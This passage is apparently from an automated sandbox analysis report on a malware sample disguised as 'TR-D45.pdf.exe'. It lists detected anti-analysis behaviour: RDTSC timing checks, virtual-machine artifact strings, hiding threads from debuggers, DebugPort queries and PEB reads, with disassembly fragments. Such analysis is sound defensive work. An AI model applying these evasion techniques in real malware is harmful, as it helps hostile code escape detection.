      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000023980E8 second address: 00000000023980E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000002390F1B second address: 0000000002399812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000005680E8 second address: 00000000005680E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000000560F1B second address: 0000000000569812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000024498E4 second address: 00000000024498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002449B5E second address: 0000000002449B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe TID: 6656Thread sleep count: 192 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4860Thread sleep time: -54000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 6664Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsers\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db@
      Source: explorer.exe, 00000005.00000000.296937352.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000005.00000000.281354355.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.282007162.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000002.495706634.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: TR-D45.pdf.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@%
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239071B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,000000000_2_0239071B
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02395737 LdrInitializeThunk,0_2_02395737
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023989D5 mov eax, dword ptr fs:[00000030h]0_2_023989D5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392372 mov eax, dword ptr fs:[00000030h]0_2_02392372
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023941DF mov eax, dword ptr fs:[00000030h]0_2_023941DF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398A59 mov eax, dword ptr fs:[00000030h]0_2_02398A59
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398A97 mov eax, dword ptr fs:[00000030h]0_2_02398A97
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398B37 mov eax, dword ptr fs:[00000030h]0_2_02398B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398B03 mov eax, dword ptr fs:[00000030h]0_2_02398B03
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392B41 mov eax, dword ptr fs:[00000030h]0_2_02392B41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02397BBE mov eax, dword ptr fs:[00000030h]0_2_02397BBE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023989FF mov eax, dword ptr fs:[00000030h]0_2_023989FF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F3B mov eax, dword ptr fs:[00000030h]0_2_02392F3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F0A mov eax, dword ptr fs:[00000030h]0_2_02392F0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F8B mov eax, dword ptr fs:[00000030h]0_2_02392F8B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02396D27 mov eax, dword ptr fs:[00000030h]0_2_02396D27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02396D4F mov eax, dword ptr fs:[00000030h]0_2_02396D4F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26E620 mov eax, dword ptr fs:[00000030h]1_2_1E26E620
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31FE3F mov eax, dword ptr fs:[00000030h]1_2_1E31FE3F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E298E00 mov eax, dword ptr fs:[00000030h]1_2_1E298E00
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h]1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h]1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321608 mov eax, dword ptr fs:[00000030h]1_2_1E321608
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27766D mov eax, dword ptr fs:[00000030h]1_2_1E27766D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h]1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h]1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E46A7 mov eax, dword ptr fs:[00000030h]1_2_1E2E46A7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFE87 mov eax, dword ptr fs:[00000030h]1_2_1E2FFE87
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2776E2 mov eax, dword ptr fs:[00000030h]1_2_1E2776E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2916E0 mov ecx, dword ptr fs:[00000030h]1_2_1E2916E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338ED6 mov eax, dword ptr fs:[00000030h]1_2_1E338ED6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2936CC mov eax, dword ptr fs:[00000030h]1_2_1E2936CC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A8EC7 mov eax, dword ptr fs:[00000030h]1_2_1E2A8EC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31FEC0 mov eax, dword ptr fs:[00000030h]1_2_1E31FEC0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h]1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h]1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29E730 mov eax, dword ptr fs:[00000030h]1_2_1E29E730
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h]1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h]1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h]1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h]1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28F716 mov eax, dword ptr fs:[00000030h]1_2_1E28F716
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27FF60 mov eax, dword ptr fs:[00000030h]1_2_1E27FF60
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338F6A mov eax, dword ptr fs:[00000030h]1_2_1E338F6A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27EF40 mov eax, dword ptr fs:[00000030h]1_2_1E27EF40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E278794 mov eax, dword ptr fs:[00000030h]1_2_1E278794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A37F5 mov eax, dword ptr fs:[00000030h]1_2_1E2A37F5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29BC2C mov eax, dword ptr fs:[00000030h]1_2_1E29BC2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28746D mov eax, dword ptr fs:[00000030h]1_2_1E28746D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A44B mov eax, dword ptr fs:[00000030h]1_2_1E29A44B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h]1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h]1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27849B mov eax, dword ptr fs:[00000030h]1_2_1E27849B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3214FB mov eax, dword ptr fs:[00000030h]1_2_1E3214FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338CD6 mov eax, dword ptr fs:[00000030h]1_2_1E338CD6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338D34 mov eax, dword ptr fs:[00000030h]1_2_1E338D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32E539 mov eax, dword ptr fs:[00000030h]1_2_1E32E539
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26AD30 mov eax, dword ptr fs:[00000030h]1_2_1E26AD30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2EA537 mov eax, dword ptr fs:[00000030h]1_2_1E2EA537
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h]1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h]1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A3D43 mov eax, dword ptr fs:[00000030h]1_2_1E2A3D43
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E3540 mov eax, dword ptr fs:[00000030h]1_2_1E2E3540
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E313D40 mov eax, dword ptr fs:[00000030h]1_2_1E313D40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E287D50 mov eax, dword ptr fs:[00000030h]1_2_1E287D50
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2935A1 mov eax, dword ptr fs:[00000030h]1_2_1E2935A1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h]1_2_1E291DB5
      Sou